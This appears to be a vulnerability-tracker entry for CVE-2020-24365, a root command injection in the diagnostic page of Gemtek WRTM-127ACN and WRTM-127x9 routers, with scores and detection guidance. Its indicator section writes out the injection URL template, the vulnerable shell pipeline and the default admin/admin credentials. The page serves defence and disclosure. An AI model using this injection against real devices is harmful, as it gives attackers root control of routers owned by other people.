CVE-2020-24365
published 2020-09-24CVE-2020-24365: An issue was discovered on Gemtek WRTM-127ACN 01.01.02.141 and WRTM-127x9 01.01.02.127 devices. The Monitor Diagnostic network page allows an authenticated…
PriorityP270high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
11.41%
95.5th percentile
An issue was discovered on Gemtek WRTM-127ACN 01.01.02.141 and WRTM-127x9 01.01.02.127 devices. The Monitor Diagnostic network page allows an authenticated attacker to execute a command directly on the target machine. Commands are executed as the root user (uid 0). (Even if a login is required, most routers are left with default credentials.)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gemteks | wrtm-127acn_firmware | — | — |
| gemteks | wrtm-127x9_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://<target>/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$(<command>;)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4↗
commandsh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&↗
- →Monitor HTTP GET requests to /cgi-bin/sysconf.cgi with query parameters action=save_monitor_diagnostic and mon_diag_addr containing shell metacharacters such as $( or ; — this is the injection point for CVE-2020-24365. ↗
- →Alert on HTTP POST to /cgi-bin/sysconf.cgi?page=login.asp&action=login with default credentials (user_name=admin, user_passwd=admin), followed immediately by exploitation requests to the diagnostic endpoint — indicative of automated exploit tool usage. ↗
- →Detect the presence of the session cookie 'sid' being set as a custom HTTP request header (rather than a standard Cookie header), which is the session-handling pattern used by the exploit. ↗
- →Commands injected via mon_diag_addr are executed as root (uid 0); monitor for unexpected child processes spawned from the CGI handler, especially ping or wget processes with unusual arguments or destinations. ↗
- →Watch for creation or modification of /tmp/mon_diag.log on Gemtek WRTM-127ACN / WRTM-127x9 devices, which is the output file written by the injected command pipeline. ↗
- →Detect wget invocations writing to /tmp/<filename> on the device, which is the file-download capability built into the exploit for staging additional payloads. ↗
- ·The exploit requires authentication, but the researcher notes that most routers are left with default credentials (admin/admin), making pre-auth effectively trivial in practice. ↗
- ·The vulnerability affects two distinct firmware versions; detection rules and patching must cover both 01.01.02.141 (WRTM-127ACN) and 01.01.02.127 (WRTM-127x9). ↗
- ·The exploit author notes that some injected commands can get stuck, requiring a second identical request to stop them; this double-request pattern (same payload sent twice) can be used as a behavioral detection signal. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2020-09-24
Published